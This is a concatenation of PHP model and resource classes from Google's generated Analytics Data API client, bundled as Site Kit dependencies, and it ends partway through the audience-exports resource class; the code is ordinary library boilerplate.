<?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class RunReportResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'totals'; protected $dimensionHeadersType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionHeader::class; protected $dimensionHeadersDataType = 'array'; /** * @var string */ public $kind; protected $maximumsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Row::class; protected $maximumsDataType = 'array'; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\ResponseMetaData::class; protected $metadataDataType = ''; protected $metricHeadersType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MetricHeader::class; protected $metricHeadersDataType = 'array'; protected $minimumsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Row::class; protected $minimumsDataType = 'array'; protected $propertyQuotaType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\PropertyQuota::class; protected $propertyQuotaDataType = ''; /** * @var int */ public $rowCount; protected $rowsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Row::class; protected $rowsDataType = 'array'; protected $totalsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Row::class; protected $totalsDataType = 'array'; /** * @param DimensionHeader[] */ public function setDimensionHeaders($dimensionHeaders) { $this->dimensionHeaders = $dimensionHeaders; } /** * @return DimensionHeader[] */ public function getDimensionHeaders() { return $this->dimensionHeaders; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param Row[] */ public function setMaximums($maximums) { $this->maximums = $maximums; } /** * @return Row[] */ public function getMaximums() { return $this->maximums; } /** * @param ResponseMetaData */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\ResponseMetaData $metadata) { $this->metadata = $metadata; } /** * @return ResponseMetaData */ public function getMetadata() { return $this->metadata; } /** * @param MetricHeader[] */ public function setMetricHeaders($metricHeaders) { $this->metricHeaders = $metricHeaders; } /** * @return MetricHeader[] */ public function getMetricHeaders() { return $this->metricHeaders; } /** * @param Row[] */ public function setMinimums($minimums) { $this->minimums = $minimums; } /** * @return Row[] */ public function getMinimums() { return $this->minimums; } /** * @param PropertyQuota */ public function setPropertyQuota(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\PropertyQuota $propertyQuota) { $this->propertyQuota = $propertyQuota; } /** * @return PropertyQuota */ public function getPropertyQuota() { return $this->propertyQuota; } /** * @param int */ public function setRowCount($rowCount) { $this->rowCount = $rowCount; } /** * @return int */ public function getRowCount() { return $this->rowCount; } /** * @param Row[] */ public function setRows($rows) { $this->rows = $rows; } /** * @return Row[] */ public function getRows() { return $this->rows; } /** * @param Row[] */ public function setTotals($totals) { $this->totals = $totals; } /** * @return Row[] */ public function getTotals() { return $this->totals; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunReportResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_RunReportResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class V1betaAudienceDimension extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $dimensionName; /** * @param string */ public function setDimensionName($dimensionName) { $this->dimensionName = $dimensionName; } /** * @return string */ public function getDimensionName() { return $this->dimensionName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\V1betaAudienceDimension::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_V1betaAudienceDimension'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class DimensionOrderBy extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $dimensionName; /** * @var string */ public $orderType; /** * @param string */ public function setDimensionName($dimensionName) { $this->dimensionName = $dimensionName; } /** * @return string */ public function getDimensionName() { return $this->dimensionName; } /** * @param string */ public function setOrderType($orderType) { $this->orderType = $orderType; } /** * @return string */ public function getOrderType() { return $this->orderType; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionOrderBy::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_DimensionOrderBy'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class CohortReportSettings extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $accumulate; /** * @param bool */ public function setAccumulate($accumulate) { $this->accumulate = $accumulate; } /** * @return bool */ public function getAccumulate() { return $this->accumulate; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CohortReportSettings::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_CohortReportSettings'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class V1betaAudienceDimensionValue extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $value; /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\V1betaAudienceDimensionValue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_V1betaAudienceDimensionValue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class ActiveMetricRestriction extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'restrictedMetricTypes'; /** * @var string */ public $metricName; /** * @var string[] */ public $restrictedMetricTypes; /** * @param string */ public function setMetricName($metricName) { $this->metricName = $metricName; } /** * @return string */ public function getMetricName() { return $this->metricName; } /** * @param string[] */ public function setRestrictedMetricTypes($restrictedMetricTypes) { $this->restrictedMetricTypes = $restrictedMetricTypes; } /** * @return string[] */ public function getRestrictedMetricTypes() { return $this->restrictedMetricTypes; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\ActiveMetricRestriction::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_ActiveMetricRestriction'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class AudienceListMetadata extends \Google\Site_Kit_Dependencies\Google\Model { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\AudienceListMetadata::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_AudienceListMetadata'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class DateRange extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $endDate; /** * @var string */ public $name; /** * @var string */ public $startDate; /** * @param string */ public function setEndDate($endDate) { $this->endDate = $endDate; } /** * @return string */ public function getEndDate() { return $this->endDate; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setStartDate($startDate) { $this->startDate = $startDate; } /** * @return string */ public function getStartDate() { return $this->startDate; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DateRange::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_DateRange'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class Status extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'details'; /** * @var int */ public $code; /** * @var array[] */ public $details; /** * @var string */ public $message; /** * @param int */ public function setCode($code) { $this->code = $code; } /** * @return int */ public function getCode() { return $this->code; } /** * @param array[] */ public function setDetails($details) { $this->details = $details; } /** * @return array[] */ public function getDetails() { return $this->details; } /** * @param string */ public function setMessage($message) { $this->message = $message; } /** * @return string */ public function getMessage() { return $this->message; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Status::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_Status'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class PivotDimensionHeader extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'dimensionValues'; protected $dimensionValuesType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionValue::class; protected $dimensionValuesDataType = 'array'; /** * @param DimensionValue[] */ public function setDimensionValues($dimensionValues) { $this->dimensionValues = $dimensionValues; } /** * @return DimensionValue[] */ public function getDimensionValues() { return $this->dimensionValues; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\PivotDimensionHeader::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_PivotDimensionHeader'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class RunRealtimeReportRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'orderBys'; protected $dimensionFilterType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression::class; protected $dimensionFilterDataType = ''; protected $dimensionsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Dimension::class; protected $dimensionsDataType = 'array'; /** * @var string */ public $limit; /** * @var string[] */ public $metricAggregations; protected $metricFilterType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression::class; protected $metricFilterDataType = ''; protected $metricsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Metric::class; protected $metricsDataType = 'array'; protected $minuteRangesType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MinuteRange::class; protected $minuteRangesDataType = 'array'; protected $orderBysType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\OrderBy::class; protected $orderBysDataType = 'array'; /** * @var bool */ public $returnPropertyQuota; /** * @param FilterExpression */ public function setDimensionFilter(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression $dimensionFilter) { $this->dimensionFilter = $dimensionFilter; } /** * @return FilterExpression */ public function getDimensionFilter() { return $this->dimensionFilter; } /** * @param Dimension[] */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return Dimension[] */ public function getDimensions() { return $this->dimensions; } /** * @param string */ public function setLimit($limit) { $this->limit = $limit; } /** * @return string */ public function getLimit() { return $this->limit; } /** * @param string[] */ public function setMetricAggregations($metricAggregations) { $this->metricAggregations = $metricAggregations; } /** * @return string[] */ public function getMetricAggregations() { return $this->metricAggregations; } /** * @param FilterExpression */ public function setMetricFilter(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression $metricFilter) { $this->metricFilter = $metricFilter; } /** * @return FilterExpression */ public function getMetricFilter() { return $this->metricFilter; } /** * @param Metric[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return Metric[] */ public function getMetrics() { return $this->metrics; } /** * @param MinuteRange[] */ public function setMinuteRanges($minuteRanges) { $this->minuteRanges = $minuteRanges; } /** * @return MinuteRange[] */ public function getMinuteRanges() { return $this->minuteRanges; } /** * @param OrderBy[] */ public function setOrderBys($orderBys) { $this->orderBys = $orderBys; } /** * @return OrderBy[] */ public function getOrderBys() { return $this->orderBys; } /** * @param bool */ public function setReturnPropertyQuota($returnPropertyQuota) { $this->returnPropertyQuota = $returnPropertyQuota; } /** * @return bool */ public function getReturnPropertyQuota() { return $this->returnPropertyQuota; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunRealtimeReportRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_RunRealtimeReportRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class MetricCompatibility extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $compatibility; protected $metricMetadataType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MetricMetadata::class; protected $metricMetadataDataType = ''; /** * @param string */ public function setCompatibility($compatibility) { $this->compatibility = $compatibility; } /** * @return string */ public function getCompatibility() { return $this->compatibility; } /** * @param MetricMetadata */ public function setMetricMetadata(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MetricMetadata $metricMetadata) { $this->metricMetadata = $metricMetadata; } /** * @return MetricMetadata */ public function getMetricMetadata() { return $this->metricMetadata; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MetricCompatibility::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_MetricCompatibility'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class CohortSpec extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'cohorts'; protected $cohortReportSettingsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CohortReportSettings::class; protected $cohortReportSettingsDataType = ''; protected $cohortsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Cohort::class; protected $cohortsDataType = 'array'; protected $cohortsRangeType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CohortsRange::class; protected $cohortsRangeDataType = ''; /** * @param CohortReportSettings */ public function setCohortReportSettings(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CohortReportSettings $cohortReportSettings) { $this->cohortReportSettings = $cohortReportSettings; } /** * @return CohortReportSettings */ public function getCohortReportSettings() { return $this->cohortReportSettings; } /** * @param Cohort[] */ public function setCohorts($cohorts) { $this->cohorts = $cohorts; } /** * @return Cohort[] */ public function getCohorts() { return $this->cohorts; } /** * @param CohortsRange */ public function setCohortsRange(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CohortsRange $cohortsRange) { $this->cohortsRange = $cohortsRange; } /** * @return CohortsRange */ public function getCohortsRange() { return $this->cohortsRange; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CohortSpec::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_CohortSpec'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class NumericFilter extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $operation; protected $valueType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\NumericValue::class; protected $valueDataType = ''; /** * @param string */ public function setOperation($operation) { $this->operation = $operation; } /** * @return string */ public function getOperation() { return $this->operation; } /** * @param NumericValue */ public function setValue(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\NumericValue $value) { $this->value = $value; } /** * @return NumericValue */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\NumericFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_NumericFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class QueryAudienceExportResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'audienceRows'; protected $audienceExportType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\AudienceExport::class; protected $audienceExportDataType = ''; protected $audienceRowsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\V1betaAudienceRow::class; protected $audienceRowsDataType = 'array'; /** * @var int */ public $rowCount; /** * @param AudienceExport */ public function setAudienceExport(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\AudienceExport $audienceExport) { $this->audienceExport = $audienceExport; } /** * @return AudienceExport */ public function getAudienceExport() { return $this->audienceExport; } /** * @param V1betaAudienceRow[] */ public function setAudienceRows($audienceRows) { $this->audienceRows = $audienceRows; } /** * @return V1betaAudienceRow[] */ public function getAudienceRows() { return $this->audienceRows; } /** * @param int */ public function setRowCount($rowCount) { $this->rowCount = $rowCount; } /** * @return int */ public function getRowCount() { return $this->rowCount; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QueryAudienceExportResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_QueryAudienceExportResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class CohortsRange extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var int */ public $endOffset; /** * @var string */ public $granularity; /** * @var int */ public $startOffset; /** * @param int */ public function setEndOffset($endOffset) { $this->endOffset = $endOffset; } /** * @return int */ public function getEndOffset() { return $this->endOffset; } /** * @param string */ public function setGranularity($granularity) { $this->granularity = $granularity; } /** * @return string */ public function getGranularity() { return $this->granularity; } /** * @param int */ public function setStartOffset($startOffset) { $this->startOffset = $startOffset; } /** * @return int */ public function getStartOffset() { return $this->startOffset; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CohortsRange::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_CohortsRange'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class DimensionHeader extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $name; /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionHeader::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_DimensionHeader'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class Row extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'metricValues'; protected $dimensionValuesType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionValue::class; protected $dimensionValuesDataType = 'array'; protected $metricValuesType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MetricValue::class; protected $metricValuesDataType = 'array'; /** * @param DimensionValue[] */ public function setDimensionValues($dimensionValues) { $this->dimensionValues = $dimensionValues; } /** * @return DimensionValue[] */ public function getDimensionValues() { return $this->dimensionValues; } /** * @param MetricValue[] */ public function setMetricValues($metricValues) { $this->metricValues = $metricValues; } /** * @return MetricValue[] */ public function getMetricValues() { return $this->metricValues; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Row::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_Row'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class EmptyFilter extends \Google\Site_Kit_Dependencies\Google\Model { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\EmptyFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_EmptyFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Resource; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\AudienceExport; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\ListAudienceExportsResponse; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Operation; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QueryAudienceExportRequest; use Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QueryAudienceExportResponse; /** * The "audienceExports" collection of methods. * Typical usage is: * <code> * $analyticsdataService = new Google\Service\AnalyticsData(...); * $audienceExports = $analyticsdataService->properties_audienceExports; * </code> */ class PropertiesAudienceExports extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates an audience export for later retrieval. This method quickly returns * the audience export's resource name and initiates a long running asynchronous * request to form an audience export. To export the users in an audience * export, first create the audience export through this method and then send * the audience resource name to the `QueryAudienceExport` method. See [Creating * an Audience Export](https://developers.google.com/analytics/devguides/reporti * ng/data/v1/audience-list-basics) for an introduction to Audience Exports with * examples. An audience export is a snapshot of the users currently in the * audience at the time of audience export creation. Creating audience exports * for one audience on different days will return different results as users * enter and exit the audience. Audiences in Google Analytics 4 allow you to * segment your users in the ways that are important to your business. To learn * more, see https://support.google.com/analytics/answer/9267572. Audience * exports contain the users in each audience. Audience Export APIs have some * methods at alpha and other methods at beta stability. The intention is to * advance methods to beta stability after some feedback and adoption. To give * your feedback on this API, complete the [Google Analytics Audience Export API * Feedback](https://forms.gle/EeA5u5LW6PEggtCEA) form. (audienceExports.create) * * @param string $parent Required. The parent resource where this audience * export will be created. Format: `properties/{property}` * @param AudienceExport $postBody * @param array $optParams Optional parameters. * @return Operation * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\AudienceExport $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Operation::class); } /** * Gets configuration metadata about a specific audience export. This method can * be used to understand an audience export after it has been created. See * [Creating an Audience Export](https://developers.google.com/analytics/devguid * es/reporting/data/v1/audience-list-basics) for an introduction to Audience * Exports with examples. Audience Export APIs have some methods at alpha and * other methods at beta stability. The intention is to advance methods to beta * stability after some feedback and adoption. To give your feedback on this * API, complete the [Google Analytics Audience Export API * Feedback](https://forms.gle/EeA5u5LW6PEggtCEA) form. (audienceExports.get) * * @param string $name Required. The audience export resource name. Format: * `properties/{property}/audienceExports/{audience_export}` * @param array $optParams Optional parameters. * @return AudienceExport * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], 